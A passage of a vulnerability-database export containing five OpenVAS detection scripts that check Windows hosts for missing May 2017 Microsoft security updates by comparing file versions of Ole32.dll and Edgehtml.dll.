"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:30", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811113", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019215)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811113\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0228\", \"CVE-2017-0231\", \"CVE-2017-0238\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98102, 98103, 98127, 98139, 98164,\n 98173, 98237, 98108, 98112, 98113, 98258, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019215)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64 systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019215\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.3.9600.18666\"))\n{\n report = 'File checked: ' + sysPath + \"\\System32\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18666\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:44", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019214)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019214)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811112\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\", \"CVE-2017-0222\",\n \"CVE-2017-0226\", \"CVE-2017-0238\", \"CVE-2017-0245\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0263\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98114, 98115, 98112, 98111, 98097, 98274, 98273, 98298, 98271,\n 98270, 98272, 98259, 98258, 98237, 98108, 98121, 98127, 98103,\n 98102, 98260, 98261, 98263, 98264, 98265, 98266, 98267, 98268,\n 98139);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:57:51 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019214)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n and security improvements in Microsoft Graphics Component, Windows COM,\n Windows Server, Windows Kernel and Microsoft Windows DNS\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n and access information from one domain and inject it into another domain, bypass\n security restrictions, conduct denial-of-service condition and gain access to\n potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019214\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.2.9200.22141\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22141\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:18", "description": "This host is missing important/critical\n security update according to Microsoft Security update KB4019474.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811111", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019474)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811111\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98259, 98261, 98263, 98264,\n 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271, 98272,\n 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019474)\");\n\n script_tag(name:\"summary\", value:\"This host is missing important/critical\n security update according to Microsoft Security update KB4019474.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019474\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_is_less(version:edgeVer, test_version:\"11.0.10240.17394\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: Less than 11.0.10240.17394\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:38", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019473.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019473)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019473)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811110\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98276, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019473)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019473.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019473\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.915\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.915\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:39", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019472.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019472)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0221", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811107", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019472)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811107\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0212\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0221\",\n \"CVE-2017-0222\", \"CVE-2017-0226\", \"CVE-2017-0227\", \"CVE-2017-0228\",\n \"CVE-2017-0229\", \"CVE-2017-0230\", \"CVE-2017-0231\", \"CVE-2017-0233\",\n \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\",\n \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\",\n \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98099, 98102, 98103, 98147, 98127,\n 98139, 98281, 98164, 98217, 98222, 98173, 98179, 98229, 98234,\n 98237, 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276,\n 98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267,\n 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:54:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019472)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019472.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019472\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1197\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1197\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 